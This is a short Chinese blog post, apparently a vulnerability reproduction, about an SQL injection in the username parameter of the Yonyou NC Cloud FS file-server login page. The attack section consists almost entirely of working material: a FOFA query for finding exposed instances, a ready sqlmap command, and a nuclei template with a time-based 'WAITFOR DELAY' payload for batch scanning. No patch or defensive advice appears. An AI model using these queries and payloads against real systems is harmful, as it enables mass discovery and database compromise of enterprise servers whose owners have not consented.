用友NC Cloud FS文件服务器SQL注入

漏洞描述

用友 NCCloud FS文件管理登录页面对用户名参数没有过滤,存在SQL注入。

漏洞影响

用友NC Cloud且存在FS文件服务器配置管理登录页面。

漏洞复现

fofa语法:app="用友-NC-Cloud" && icon_hash="1596996317"
用友NC Cloud登录页面如下:

在应用中存在文件服务器管理登录页面
http://xxx.xxx.xxx.xxx/fs/

拦截文件服务器页面的登录请求数据包,然后直接sqlmap梭哈。
sqlmap -u "http://IP:PORT/fs/console?username=admin&password=%2Bz3VgEDJpVuEHdRPPzbCFTCa9Q0sKLOZ5q4ZLhxjuok%3D" --batch -p username

nuclei批量yaml文件

id: yonyou_NCCloud_FS_sqli

info:
  name: 用友 NCCloud FS文件管理SQL注入
  author: mczilong
  severity: critical
  tags: yonyou 
  description: fofa   "NCCloud"
requests:
  - raw:
      - |
        @timeout: 15s
        GET /fs/console?username=222%27;WAITFOR%20DELAY%20%270:0:8%27--&password=WiEZoxowjDhBk7bfE9nvzP3TjiK/RivMT1jKxrq42bI HTTP/1.1
        Host: {{Hostname}}        

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration>=8'
posted @   学安全的小白  阅读(956)  评论(0编辑  收藏  举报
相关博文:
· 用友NC service接口信息泄露漏洞
· 用友NC uapws接口老版本存在数据库账号密码泄露
· 用友NCCloud FS文件管理SQL注入
· 用友NC6.5反序列化文件上传漏洞 nuclei
· 【漏洞复现】用友NC-Cloud PMCloudDriveProjectStateServlet接口存在JNDI注入漏洞
阅读排行:
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么 退出登录 或 修改密码 无法使 token 失效
点击右上角即可分享
微信分享提示